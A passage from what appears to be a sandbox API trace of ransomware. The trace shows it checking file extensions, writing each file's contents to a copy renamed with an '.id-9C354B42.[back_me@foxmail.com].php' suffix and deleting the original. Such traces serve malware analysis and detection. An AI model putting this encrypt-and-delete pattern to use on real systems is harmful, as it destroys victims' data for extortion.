Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0252.046] lstrlenW (lpString=".1cd") returned 4 [0252.046] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0252.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0252.046] lstrlenW (lpString=".jpg") returned 4 [0252.046] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0252.046] lstrcmpiW (lpString1=".VRD", lpString2=".php") returned 1 [0252.046] lstrlenW (lpString="EQPLIST.VRD") returned 11 [0252.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0252.049] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=1699) returned 1 [0252.050] CloseHandle (hObject=0x38c) returned 1 [0252.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd")) returned 0x20 [0252.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0252.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0252.057] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0252.057] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0252.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0252.494] GetLastError () returned 0x0 [0252.494] ReadFile (in: hFile=0x2e8, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x6a3, lpOverlapped=0x0) returned 1 [0252.734] WriteFile (in: hFile=0x3b0, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x6b0, lpOverlapped=0x0) returned 1 [0252.735] ReadFile (in: hFile=0x2e8, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0252.735] WriteFile (in: hFile=0x3b0, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xea, lpOverlapped=0x0) returned 1 [0252.735] SetEndOfFile (hFile=0x3b0) returned 1 [0252.735] CloseHandle (hObject=0x3b0) returned 1 [0252.735] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0252.735] SetEndOfFile (hFile=0x2e8) returned 1 [0252.738] CloseHandle (hObject=0x2e8) returned 1 [0252.738] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0252.926] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd")) returned 1 [0252.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0252.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0252.938] lstrlenW (lpString=".doc") returned 4 [0252.938] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0252.938] lstrlenW (lpString=".docx") returned 5 [0252.938] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1 [0252.939] lstrlenW (lpString=".pdf") returned 4 [0252.939] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0252.939] lstrlenW (lpString=".xls") returned 4 [0252.939] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0252.939] lstrlenW (lpString=".xlsx") returned 5 [0252.939] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1 [0252.939] lstrlenW (lpString=".ppt") returned 4 [0252.939] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0252.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0252.939] lstrlenW (lpString=".zip") returned 4 [0252.939] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0252.939] lstrlenW (lpString=".rar") returned 4 [0252.939] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0252.939] lstrlenW (lpString=".bz2") returned 4 [0252.939] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0252.939] lstrlenW (lpString=".7z") returned 3 [0252.939] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0252.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0252.939] lstrlenW (lpString=".dbf") returned 4 [0252.939] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0252.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0252.939] lstrlenW (lpString=".1cd") returned 4 [0252.939] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0252.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0252.939] lstrlenW (lpString=".jpg") returned 4 [0252.939] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0252.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0252.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0252.939] lstrlenW (lpString=".doc") returned 4 [0252.940] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0252.940] lstrlenW (lpString=".docx") returned 5 [0252.940] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1 [0252.940] lstrlenW (lpString=".pdf") returned 4 [0252.940] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0252.940] lstrlenW (lpString=".xls") returned 4 [0252.940] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0252.940] lstrlenW (lpString=".xlsx") returned 5 [0252.940] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1 [0252.940] lstrlenW (lpString=".ppt") returned 4 [0252.940] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0252.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0252.940] lstrlenW (lpString=".zip") returned 4 [0252.940] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0252.940] lstrlenW (lpString=".rar") returned 4 [0252.940] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0252.940] lstrlenW (lpString=".bz2") returned 4 [0252.940] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0252.940] lstrlenW (lpString=".7z") returned 3 [0252.940] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0252.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0252.940] lstrlenW (lpString=".dbf") returned 4 [0252.940] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0252.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0252.940] lstrlenW (lpString=".1cd") returned 4 [0252.940] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0252.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0252.940] lstrlenW (lpString=".jpg") returned 4 [0252.940] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0252.941] lstrcmpiW (lpString1=".HXS", lpString2=".php") returned -1 [0252.941] lstrlenW (lpString="GROOVE.HXS") returned 10 [0252.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0252.947] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=2278416) returned 1 [0252.947] CloseHandle (hObject=0x388) returned 1 [0252.947] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs")) returned 0x20 [0252.956] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0252.963] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0252.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0252.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0252.963] lstrlenW (lpString=".doc") returned 4 [0252.963] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1 [0252.963] lstrlenW (lpString=".docx") returned 5 [0252.964] lstrcmpiW (lpString1=".docx", lpString2="E.HXS") returned -1 [0252.964] lstrlenW (lpString=".pdf") returned 4 [0252.964] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1 [0252.964] lstrlenW (lpString=".xls") returned 4 [0252.964] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1 [0252.964] lstrlenW (lpString=".xlsx") returned 5 [0252.964] lstrcmpiW (lpString1=".xlsx", lpString2="E.HXS") returned -1 [0252.964] lstrlenW (lpString=".ppt") returned 4 [0252.964] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1 [0252.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0252.964] lstrlenW (lpString=".zip") returned 4 [0252.964] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1 [0252.964] lstrlenW (lpString=".rar") returned 4 [0252.964] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1 [0252.964] lstrlenW (lpString=".bz2") returned 4 [0252.964] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1 [0252.964] lstrlenW (lpString=".7z") returned 3 [0252.964] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1 [0252.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0252.964] lstrlenW (lpString=".dbf") returned 4 [0252.964] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1 [0252.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0252.964] lstrlenW (lpString=".1cd") returned 4 [0252.964] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1 [0252.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0252.964] lstrlenW (lpString=".jpg") returned 4 [0252.964] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1 [0252.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0252.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0252.964] lstrlenW (lpString=".doc") returned 4 [0252.964] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1 [0252.964] lstrlenW (lpString=".docx") returned 5 [0252.965] lstrcmpiW (lpString1=".docx", lpString2="E.HXS") returned -1 [0252.965] lstrlenW (lpString=".pdf") returned 4 [0252.965] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1 [0252.965] lstrlenW (lpString=".xls") returned 4 [0252.965] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1 [0252.965] lstrlenW (lpString=".xlsx") returned 5 [0252.965] lstrcmpiW (lpString1=".xlsx", lpString2="E.HXS") returned -1 [0252.965] lstrlenW (lpString=".ppt") returned 4 [0252.965] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1 [0252.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0252.965] lstrlenW (lpString=".zip") returned 4 [0252.965] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1 [0252.965] lstrlenW (lpString=".rar") returned 4 [0252.965] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1 [0252.965] lstrlenW (lpString=".bz2") returned 4 [0252.965] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1 [0252.965] lstrlenW (lpString=".7z") returned 3 [0252.965] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1 [0252.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0252.965] lstrlenW (lpString=".dbf") returned 4 [0252.965] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1 [0252.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0252.965] lstrlenW (lpString=".1cd") returned 4 [0252.965] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1 [0252.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0252.965] lstrlenW (lpString=".jpg") returned 4 [0252.965] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1 [0252.965] lstrcmpiW (lpString1=".HXT", lpString2=".php") returned -1 [0252.965] lstrlenW (lpString="GROOVE_COL.HXT") returned 14 [0252.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0252.966] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=218) returned 1 [0252.966] CloseHandle (hObject=0x388) returned 1 [0252.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt")) returned 0x20 [0252.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0252.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0252.966] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0252.966] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0252.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0252.967] GetLastError () returned 0x0 [0252.967] ReadFile (in: hFile=0x388, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0xda, lpOverlapped=0x0) returned 1 [0252.967] WriteFile (in: hFile=0x204, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0252.968] ReadFile (in: hFile=0x388, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0252.968] WriteFile (in: hFile=0x204, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0252.968] SetEndOfFile (hFile=0x204) returned 1 [0252.968] CloseHandle (hObject=0x204) returned 1 [0252.968] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0252.968] SetEndOfFile (hFile=0x388) returned 1 [0252.971] CloseHandle (hObject=0x388) returned 1 [0252.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0252.971] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt")) returned 1 [0252.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0252.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0252.971] lstrlenW (lpString=".doc") returned 4 [0252.971] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0252.971] lstrlenW (lpString=".docx") returned 5 [0252.971] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0252.971] lstrlenW (lpString=".pdf") returned 4 [0252.971] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0252.971] lstrlenW (lpString=".xls") returned 4 [0252.971] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0252.971] lstrlenW (lpString=".xlsx") returned 5 [0252.971] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0252.971] lstrlenW (lpString=".ppt") returned 4 [0252.972] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0252.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0252.972] lstrlenW (lpString=".zip") returned 4 [0252.972] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0252.972] lstrlenW (lpString=".rar") returned 4 [0252.972] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0252.972] lstrlenW (lpString=".bz2") returned 4 [0252.972] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0252.972] lstrlenW (lpString=".7z") returned 3 [0252.972] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0252.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0252.972] lstrlenW (lpString=".dbf") returned 4 [0252.972] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0252.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0252.972] lstrlenW (lpString=".1cd") returned 4 [0252.972] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0252.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0252.972] lstrlenW (lpString=".jpg") returned 4 [0252.972] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0252.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0252.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0252.972] lstrlenW (lpString=".doc") returned 4 [0252.972] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0252.972] lstrlenW (lpString=".docx") returned 5 [0252.972] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0252.972] lstrlenW (lpString=".pdf") returned 4 [0252.972] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0252.972] lstrlenW (lpString=".xls") returned 4 [0252.972] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0252.972] lstrlenW (lpString=".xlsx") returned 5 [0252.972] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0252.972] lstrlenW (lpString=".ppt") returned 4 [0252.973] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0252.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0252.973] lstrlenW (lpString=".zip") returned 4 [0252.973] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0252.973] lstrlenW (lpString=".rar") returned 4 [0252.973] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0252.973] lstrlenW (lpString=".bz2") returned 4 [0252.973] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0252.973] lstrlenW (lpString=".7z") returned 3 [0252.973] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0252.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0252.973] lstrlenW (lpString=".dbf") returned 4 [0252.973] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0252.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0252.973] lstrlenW (lpString=".1cd") returned 4 [0252.973] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0252.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0252.973] lstrlenW (lpString=".jpg") returned 4 [0252.973] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0252.973] lstrcmpiW (lpString1=".HXK", lpString2=".php") returned -1 [0252.973] lstrlenW (lpString="GROOVE_F_COL.HXK") returned 16 [0252.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0252.974] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=111) returned 1 [0252.974] CloseHandle (hObject=0x388) returned 1 [0252.974] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk")) returned 0x20 [0252.974] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0252.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0252.974] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0252.974] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0252.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0252.974] GetLastError () returned 0x0 [0252.974] ReadFile (in: hFile=0x388, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x6f, lpOverlapped=0x0) returned 1 [0252.975] WriteFile (in: hFile=0x204, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x70, lpOverlapped=0x0) returned 1 [0252.976] ReadFile (in: hFile=0x388, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0252.976] WriteFile (in: hFile=0x204, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0252.976] SetEndOfFile (hFile=0x204) returned 1 [0252.976] CloseHandle (hObject=0x204) returned 1 [0252.976] SetFilePointerEx (in: hFile=0x388, 